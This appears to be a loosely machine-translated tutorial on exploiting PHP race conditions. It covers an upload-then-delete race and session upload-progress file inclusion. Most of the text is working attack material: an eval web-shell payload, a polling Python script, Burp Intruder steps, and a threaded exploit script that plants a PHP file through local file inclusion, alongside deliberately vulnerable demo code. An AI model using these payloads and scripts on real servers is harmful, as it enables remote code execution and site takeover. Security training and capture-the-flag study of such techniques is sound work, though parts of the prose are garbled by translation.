Test demo:
<html>
<body>
<form action="" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file"/>
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
<?php
if (!empty($_FILES)) {
move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);
unlink($_FILES['file']['name']);
}
?>
shell file contents:
<?PHP
echo md5(1);
fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>');
?>
Have access to upload files py script:
# coding:utf-8
import requests
def main():
i=0
while 1:
try:
print(i,end='\r')
a = requests.get("http://aaa.io/sssss.php")
if "c4ca4238a0b923820dcc509a6f75849b" in a.text:
print("OK")
break
except Exception as e:
pass
i+=1
if __name__ == '__main__':
main()
Wherein c4ca4238a0b923820dcc509a6f75849b = md5 (1)
burp Settings: -> Intrudermo sent to Module ->
Then run our py script, and open burp blasting, the order does not matter, you can turn almost next time.
Another session files and compete
demo:
<?php
if (isset($_GET['file'])) {
include './' . $_GET['file'];
}
In this case we can not upload the file, how to use it? That's file contains session.
We know session_start session control function open (), when not using the function how to do it?
The presence of session upload_progress property, used to record file upload progress, and is enabled by default state.
That is, when there PHP_SESSION_UPLOAD_PROGRESS field of our POST data packet, without calling session_start () function can also be initialized session. But the default will be cleared at the end, so we need to take advantage of the conditions of competition.
Proof demo: 1.php
<html> <body> <form action="" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888"/> <input type="file" name="file"/> <input type="submit" name="submit" value="Submit" /> </form> </body> </html> <?php ?>
Note: <input type = "text" name = "PHP_SESSION_UPLOAD_PROGRESS" value = "888" /> must be in front of the <input type = "file" name = "file" />, otherwise no way to control the session file name generation.
Exploit script:
import io
import requests
import threading
sessid = 'ph1'
def t1(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
response = session.post(
'http://localhost/2.php',
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?=file_put_contents("shell123.php","<?=phpinfo();?>")?>'},
files={'file': ('a.txt', f)},
cookies={'PHPSESSID': sessid}
)
def t2(session):
while True:
response = session.get(f'http://localhost/2.php?file=../Extensions/tmp/tmp/sess_{sessid}')
print(response.text)
with requests.session() as session:
t1 = threading.Thread(target=t1, args=(session, ))
t1.daemon = True
t1.start()
t2(session)
Modify the corresponding access path, and session file path, you can. Generate shell123.php files after successful.